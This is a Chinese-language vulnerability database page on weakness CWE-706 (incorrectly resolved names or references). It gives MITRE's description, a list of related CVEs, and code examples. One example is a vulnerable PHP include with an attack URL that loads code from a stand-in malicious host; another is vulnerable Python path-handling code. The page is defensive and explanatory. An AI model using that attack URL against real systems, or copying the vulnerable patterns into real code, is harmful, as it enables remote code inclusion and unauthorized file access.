目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CWE-706 使用不正确的解析名称或索引 类漏洞列表 36

CWE-706 使用不正确的解析名称或索引 类弱点 36 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-706属于引用解析错误漏洞,指程序使用的名称或引用未能正确解析到预期资源,导致访问了控制范围外的对象。攻击者通常通过操纵输入或环境变量,诱导系统引用恶意资源以执行未授权操作或窃取数据。开发者应严格验证输入,使用白名单机制限制可访问的资源范围,并确保引用解析过程在受控环境中进行,从而防止意外指向外部资源。

MITRE CWE 官方描述
CWE:CWE-706 使用不正确解析的名称或引用 (Use of Incorrectly-Resolved Name or Reference) 英文:产品使用名称或引用来访问资源,但该名称/引用解析到的资源超出了预期的控制范围 (intended control sphere)。
常见影响 (1)
Confidentiality, IntegrityRead Application Data, Modify Application Data
代码示例 (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os import sys def main(): filename = sys.argv[1] path = os.path.join(os.getcwd(), filename) try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Bad · Python
import os import sys def main(): filename = sys.argv[1] path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"): try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Good · Python
CVE ID标题CVSS风险等级Published
CVE-2026-40912 Traefik StripPrefixRegex路径混淆导致认证绕过漏洞 — traefik 8.2AIHighAI2026-04-30
CVE-2026-41402 OpenClaw 安全漏洞 — OpenClaw 4.2 Medium2026-04-28
CVE-2026-42254 Hickory DNS 安全漏洞 — Hickory DNS 4.0 Medium2026-04-26
CVE-2026-41354 OpenClaw 安全漏洞 — OpenClaw 3.7 Low2026-04-23
CVE-2026-35358 uutils coreutils 安全漏洞 — coreutils 4.4 Medium2026-04-22
CVE-2026-35666 OpenClaw 安全漏洞 — OpenClaw 8.8 High2026-04-10
CVE-2026-35635 OpenClaw 安全漏洞 — OpenClaw 4.8 Medium2026-04-09
CVE-2026-33732 srvx 安全漏洞 — srvx 4.8 Medium2026-03-26
CVE-2026-33490 H3 安全漏洞 — h3 3.7 Low2026-03-26
CVE-2026-1230 GitLab Enterprise Edition(EE)和GitLab Community Edition(CE) 安全漏洞 — GitLab 4.1 Medium2026-03-11
CVE-2026-30856 WeKnora 安全漏洞 — WeKnora 5.9 Medium2026-03-07
CVE-2026-25890 File Browser 安全漏洞 — filebrowser 8.1 High2026-02-09
CVE-2026-25067 SmarterTools SmarterMail 安全漏洞 — SmarterMail 9.8AICriticalAI2026-01-29
CVE-2025-13437 zx 安全漏洞 — zx 5.5 -2025-11-20
CVE-2025-62378 commandKit 安全漏洞 — commandkit 6.1 Medium2025-10-15
CVE-2025-58362 Hono 安全漏洞 — hono 7.5 High2025-09-04
CVE-2025-30357 NamelessMC 安全漏洞 — Nameless 7.3 High2025-04-18
CVE-2025-29914 OWASP Coraza WAF 安全漏洞 — coraza 5.4 Medium2025-03-20
CVE-2024-52515 Nextcloud 安全漏洞 — security-advisories 5.7 Medium2024-11-15
CVE-2024-51746 Gitsign 安全漏洞 — gitsign 6.5 -2024-11-05
CVE-2024-45305 gitoxide 安全漏洞 — gitoxide 2.5 Low2024-09-02
CVE-2024-35198 TorchServe 安全漏洞 — serve 9.8 Critical2024-07-18
CVE-2023-42125 Avast Premium Security 安全漏洞 — Premium Security 7.8 -2024-05-03
CVE-2024-27295 Directus 安全漏洞 — directus 8.2 High2024-03-01
CVE-2024-27292 Docassemble 安全漏洞 — docassemble 7.5 High2024-02-29
CVE-2023-42451 Mastodon 安全漏洞 — mastodon 7.4 High2023-09-19
CVE-2023-28643 Nextcloud 安全漏洞 — security-advisories 5.5 Medium2023-03-30
CVE-2023-28628 lambdaisland uri 输入验证错误漏洞 — uri 5.4 Medium2023-03-27
CVE-2022-31089 Parse Server 安全漏洞 — parse-server 7.5 High2022-06-27
CVE-2022-27778 curl 安全漏洞 — https://github.com/curl/curl 8.1 -2022-06-01

CWE-706(使用不正确的解析名称或索引) 是常见的弱点类别,本平台收录该类弱点关联的 36 条 CVE 漏洞。